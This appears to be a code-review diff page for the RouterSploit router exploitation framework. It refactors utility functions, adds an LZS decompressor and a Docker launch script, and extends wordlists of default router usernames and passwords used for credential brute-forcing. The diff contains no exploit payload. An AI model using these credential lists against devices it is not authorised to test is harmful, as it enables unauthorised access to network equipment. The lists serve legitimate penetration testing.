["Name", "Value", "Description"],
)
self.assertEqual(
mock_print.mock_calls,
[
mock.call(),
mock.call(' Name Value Description '),
mock.call(' ---- ----- ----------- '),
mock.call()
]
)
if __name__ == '__main__':
unittest.main()
routersploit/test/test_validators.py
......@@ -136,5 +136,6 @@ class ValidatorsTest(RoutersploitTestCase):
value = "t"
self.assertEqual(validators.boolify(value), True)
if __name__ == '__main__':
unittest.main()
routersploit/utils.py routersploit/utils/__init__.py
from __future__ import print_function
from __future__ import absolute_import
from __future__ import print_function
import threading
import os
import sys
import re
import collections
import random
import string
import errno
import importlib
import os
import random
import re
import select
import socket
import errno
from functools import wraps
from distutils.util import strtobool
import string
import sys
import threading
from abc import ABCMeta, abstractmethod
from distutils.util import strtobool
from functools import wraps
import requests
from .printer import printer_queue, thread_output_stream
from .exceptions import RoutersploitException
from . import modules as rsf_modules
from .. import modules as rsf_modules
from ..exceptions import RoutersploitException
from ..printer import printer_queue, thread_output_stream
MODULES_DIR = rsf_modules.__path__[0]
CREDS_DIR = os.path.join(MODULES_DIR, 'creds')
......@@ -326,7 +326,10 @@ def print_table(headers, *args, **kwargs):
headers_line = ' '
headers_separator_line = ' '
for idx, header in enumerate(headers):
current_line_fill = max(len(header), *map(lambda x: custom_len(x[idx]), args)) + extra_fill
column = [custom_len(arg[idx]) for arg in args]
column.append(len(header))
current_line_fill = max(column) + extra_fill
fill.append(current_line_fill)
headers_line = "".join((headers_line, "{header:<{fill}}".format(header=header, fill=current_line_fill)))
headers_separator_line = "".join((
......@@ -411,14 +414,14 @@ def random_text(length, alph=string.ascii_letters + string.digits):
return ''.join(random.choice(alph) for _ in range(length))
def http_request(method, url, **kwargs):
def http_request(method, url, session=requests, **kwargs):
""" Wrapper for 'requests' silencing exceptions a little bit. """
kwargs.setdefault('timeout', 30.0)
kwargs.setdefault('verify', False)
try:
return getattr(requests, method.lower())(url, **kwargs)
return getattr(session, method.lower())(url, **kwargs)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: {}".format(url))
return
......@@ -543,7 +546,7 @@ def tokenize(token_specification, text):
def create_exploit(path): # TODO: cover with tests
from .templates import exploit
from ..templates import exploit
parts = path.split(os.sep)
module_type, name = parts[0], parts[-1]
......
routersploit/utils/lzs.py 0 → 100644
# !/usr/bin/env python
# -*- coding:utf-8 -*-
##############################################################
# Lempel-Ziv-Stac decompression
# BitReader and RingList classes
#
# Copyright (C) 2011 Filippo Valsorda - FiloSottile
# filosottile.wiki gmail.com - www.pytux.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see &lt;http://www.gnu.org/licenses/&gt;.
#
##############################################################
import collections
class BitReader:
"""
Gets a string or a iterable of chars (also mmap)
representing bytes (ord) and permits to extract
bits one by one like a stream
"""
def __init__(self, bytes):
self._bits = collections.deque()
for byte in bytes:
byte = ord(byte)
for n in xrange(8):
self._bits.append(bool((byte >> (7 - n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in xrange(num):
res += self.getBit() << num - 1 - i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
"""
When the list is full, for every item appended
the older is removed
"""
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def LZSDecompress(data, window=RingList(2048)):
"""
Gets a string or a iterable of chars (also mmap)
representing bytes (ord) and an optional
pre-populated dictionary; return the decompressed
string and the final dictionary
"""
reader = BitReader(data)
result = ''
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
# EOF
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
lenght = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
lenght = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
lenght = 15 * lenCounter + 8 + lenField
for i in xrange(lenght):
char = window[-offset]
result += chr(char)
window.append(char)
return result, window
routersploit/wordlists/defaults.txt
......@@ -123,8 +123,10 @@ admin:123456
admin:2222
admin:22222
admin:362729
admin:Admin123
admin:AitbISP4eCiG
admin:Ascend
admin:BGCVDSL2
admin:NetCache
admin:OCS
admin:Protector
......@@ -148,6 +150,7 @@ admin:diamond
admin:epicrouter
admin:extendnet
admin:giraff
admin:gvt12345
admin:hagpolm1
admin:hello
admin:ho4uku6at
......@@ -364,12 +367,14 @@ super:surt
superadmin:secret
superadmin:Is$uper@dmin
superman:21241036
superman:superman
superman:talent
superuser:123456
superuser:admin
supervisor:PlsChgMe!
supervisor:PlsChgMe1
supervisor:supervisor
supervisor:zyad1234
support:h179350
support:support
support:supportpw
......@@ -387,6 +392,7 @@ teacher:password
tech:field
tech:tech
telco:telco
tele2:tele2
telecom:telecom
telecomadmin:telecomadmin
telecomadmin:admintelecom
......@@ -401,6 +407,7 @@ tiger:tiger123
topicalt:password
topicnorm:password
topicres:password
true:true
tw:tw
ubnt:ubnt
user:pass
......@@ -408,6 +415,7 @@ user:password
user:public
user:tivonpw
user:user
user3:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
vcr:NetVCR
volition:volition
vt100:public
......
routersploit/wordlists/passwords.txt
......@@ -24,6 +24,7 @@ $secure$
12345678
123456789
1234567890
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
1234admin
123654
123qwe
......@@ -38,6 +39,7 @@ $secure$
22222
222222
240653C9467E45
263297
266344
31994
3477
......@@ -66,6 +68,7 @@ ADMINISTRATOR
ADTRAN
ANS#150
Admin
Admin123
AitbISP4eCiG
Asante
Ascend
......@@ -80,6 +83,7 @@ Col2ogro2
D-Link
DATA
DISC
Dj9@t!n03g4r6#f
Exabyte
FIELD.SUPPORT
Fireport
......@@ -289,6 +293,7 @@ gen1
gen2
ggdaseuaimhrke
ginger
gvt12345
guest
h179350
hagpolm1
......@@ -469,6 +474,7 @@ talent
tech
telco
telecom
telkomjatineg4r4
tellabs#1
test
thomas
......@@ -511,4 +517,5 @@ xdfk9874t3
xxyyzz
zoomadsl
zxcvbnm
zyad1234
Zte521
routersploit/wordlists/usernames.txt
......@@ -261,6 +261,7 @@ topicnorm
topicres
ubnt
user
user3
vcr
veda
vodafone
......@@ -274,4 +275,4 @@ wradmin
write
xbox
xd
ZXDSL
\ No newline at end of file
ZXDSL
run_docker.sh 0 → 100755
#!/usr/bin/env bash
if [ -z $1 ] ; then
docker run -it --net host --rm routersploit
else
docker run -it --net host --rm routersploit $@
fi
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment